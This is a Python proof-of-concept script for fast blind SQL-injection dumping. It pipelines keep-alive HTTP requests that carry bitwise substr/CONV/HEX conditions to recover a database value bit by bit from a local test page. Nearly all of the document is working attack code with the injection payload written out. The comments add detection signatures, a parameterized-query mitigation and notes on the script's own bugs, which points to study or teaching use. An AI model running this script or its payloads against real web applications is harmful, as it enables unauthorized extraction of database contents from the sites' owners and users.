PoC for fast Blind SQL-Injection dumping
import socket, time, re, sys | |
from multiprocessing.dummy import Pool as ThreadPool | |
# Response fragment taken as "condition FALSE": an empty <table>. Only the
# presence of this markup in a response is tested, never its content.
bad_answ = """<table>
</table>"""
# Response fragment taken as "condition TRUE": a table carrying one (blank)
# row. Presumably the test page renders a row whenever the injected WHERE
# clause matches — TODO confirm against the target page.
good_answ = """<table>
<tr>
<td></td>
<td></td>
<td></td>
</tr>
</table>"""
s_time = time.time()  # start timestamp for the elapsed-time print at the end
# Command line: argv[1] = SQL expression to extract (read later, inside the
# try block), argv[2] = worker-thread count, argv[3] = seconds to wait for
# the pipelined responses. None of the values is validated: a missing or
# non-numeric argv[2]/argv[3] raises here, before any connection is made.
timeout = float(sys.argv[3]) # Set timeout for correct keep-alive
pool = ThreadPool(int(sys.argv[2])) # Count threads
print "Threads count - "+sys.argv[2]
print "Timeout for keep-alive - "+sys.argv[3]
def request(len, query):
    """Recover one character of the value of SQL expression *query*.

    Position *len* (1-based, as in MySQL substr()) is read one bit at a
    time: eight GET requests are pipelined on one keep-alive connection,
    each carrying a boolean condition on a single binary digit of the
    character's code, and the page fragment in each response tells true
    from false. Returns the decoded character.

    On the server side this shows up as a burst of requests whose query
    strings differ only in the substr() offsets — the signature to alert
    on; parameterizing the query on the application side removes the
    injection point altogether.

    Note that the parameter name ``len`` shadows the builtin.
    """
    num = ""
    req = ""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # Target host, port and path are hard-coded to a local test endpoint.
    s.connect(("127.0.0.1", 80))
    for pg_n in range(1,9):
        # Condition: HEX() of the character, CONV(..., 16, 2) turns that
        # into its binary string (most-significant digit first), REVERSE()
        # puts the low bit first, and substr() picks bit pg_n. Bits are
        # therefore collected least-significant first.
        req += "GET /test.php?a=1+and+substr(REVERSE(CONV(HEX(substr("
        req += query+",+"+str(len)+",1)),+16,+2)),+"+str(pg_n)+",+1)=1+--+ HTTP/1.1\r\n"
        req += "Host: 127.0.0.1\r\nConnection: keep-alive\r\n\r\n"
    # Trailing HEAD with Connection: close so the server ends the connection
    # after answering the eight pipelined GETs.
    req += "HEAD /test.php HTTP/1.1\r\nHost: 127.0.0.1\r\nConnection: close\r\n\r\n"
    # socket.send() may transmit fewer bytes than given; the count it
    # returns is not checked.
    s.send(req)
    # A fixed sleep followed by a single recv(): whatever the server delivers
    # after this one read is never seen, so the bit string can come back short.
    time.sleep(timeout)
    res = s.recv(640000000)
    # Split on the blank line between headers and body; the text preceding
    # the next status line is matched against the two page markers.
    for i in res.split("\r\n\r\n"):
        if good_answ in i.split("HTTP/1.")[0]:
            num+="1"
        elif bad_answ in i.split("HTTP/1.")[0]:
            num+="0"
    # Bits were gathered low-first, so reverse before parsing as binary.
    # An empty num (no marker matched at all) makes int() raise ValueError;
    # a short num yields a wrong character with no error.
    return chr(int(num[::-1], 2))
    # Unreachable: the return above exits first, so the socket is never
    # closed explicitly and is left to garbage collection.
    s.close()
def request_len(inj):
    """Return the length of the value of *inj* as a decimal string.

    Reads up to four characters of ``length(inj)`` one position at a time
    through request(), then cuts the result at the first NUL — positions
    past the end of the number presumably decode to '\\0' (TODO confirm).
    Also prints the length.
    """
    reslt = ""
    for i in range(1,5):
        # Sequential; each request() call opens its own connection.
        reslt+=request(i, "length("+inj+")")
    print "\nLength is "+reslt.split('\0')[0]
    # If every character decoded to NUL this is "", and int() in the
    # caller will then raise ValueError.
    return reslt.split('\0')[0]
def make_request(inj):
    """Dump the full value of SQL expression *inj* and return it as a string.

    Fetches the length first, then reads every position concurrently via
    the module-level thread pool, one connection per position. Pool.map
    preserves input order, so the join reassembles the characters in
    position order. Raises ValueError from int() when request_len()
    returned an empty string.
    """
    str_len = request_len(inj)
    reslt = ""  # left over from the sequential version below; overwritten
    # for i in range(1,int(str_len)+1):
    # print reslt
    # reslt+=request(i, inj)
    reslt = pool.map(lambda x: request(x, inj), range(1,int(str_len)+1))
    return ''.join(reslt)
try:
    # argv[1] is wrapped in parentheses and used verbatim as the SQL expression.
    print("\nResult - %s" % make_request("("+sys.argv[1]+")"))
except:
    # Bare except: swallows everything — a missing argv[1], connection
    # failures, the ValueError from a bad length, and Ctrl-C
    # (KeyboardInterrupt) — with no message about why no result appeared.
    pass
# Difference of two time.time() readings, i.e. seconds, although the label
# says "ms".
print("\nTime: %sms" % (time.time() - s_time))